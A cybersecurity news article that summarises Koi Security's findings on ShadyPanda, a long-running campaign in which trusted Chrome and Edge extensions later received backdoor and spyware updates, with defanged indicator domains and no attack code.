Researchers at Koi Security described a multi-stage operation called ShadyPanda . Over the course of seven years, attackers released seemingly useful extensions for Chrome and Edge, built up an audience with positive comments and reviews. They then released an update containing malicious code . Researchers estimate that the total number of installations reached a remarkable 4.3 million downloads .
The scheme is simple and unpleasant: “legitimate” extensions accumulate ratings, reviews, and trust badges for years, only to receive an update that contains malware, extracts arbitrary JavaScript, and executes it with full access to the browser .
The code is obfuscated and becomes silent when developer tools are opened. Telemetry is sent to attacker-controlled domains, including api.cleanmasters[.]store.
Koi identifies two active lines of attack: A backdoor targeting 300,000 computers. Five extensions (including Clean Master) received a “reverse update” in mid-2024.
The attackers’ arsenal includes page content replacement (including HTTPS), session hijacking, and comprehensive activity telemetry.
Three of them had existed for years as harmless and were even highlighted/verified, which is why their updates were distributed immediately. These five have already been removed from the stores, but the infrastructure on infected browsers remains. A spyware kit for over 4 million Edge installations. Publisher Starlab Technology released five more add-ons in 2023.
Two of these are actual spyware. The flagship is WeTab , with approximately 3 million installations: it collects all visited URLs, search queries, clicks, browser fingerprints, and browsing behavior and sends them in real time to 17 domains (eight are Baidu in China, seven are WeTab and Google Analytics).
At the time of publication , Koi notes that WeTab is still available in the Edge catalog.
This gives attackers leverage: they can reach the same RCE backdoor at any time . Koi also linked ShadyPanda to previous waves: in 2023, “wallpapers and productivity” (145 extensions across two stores), where traffic was monetized by spoofing affiliate tags and harvesting search queries; later, search interception via trovi[.]com and cookie exfiltration. In all cases, the gamble was the same: after initial moderation, marketplaces rarely monitor extension behavior, which is precisely what the entire “silent updates” strategy was aimed at.
Five extensions with an RCE backdoor have already been removed from the Chrome Web Store; WeTab , however, remains in the Edge add-ons store. Google generally emphasizes that updates undergo a review process, as stated in its documentation, but the ShadyPanda case demonstrates that targeted moderation from the outset is not enough.
Follow us on Google News to receive daily updates on cybersecurity. Contact us if you would like to report news, insights or content for publication.
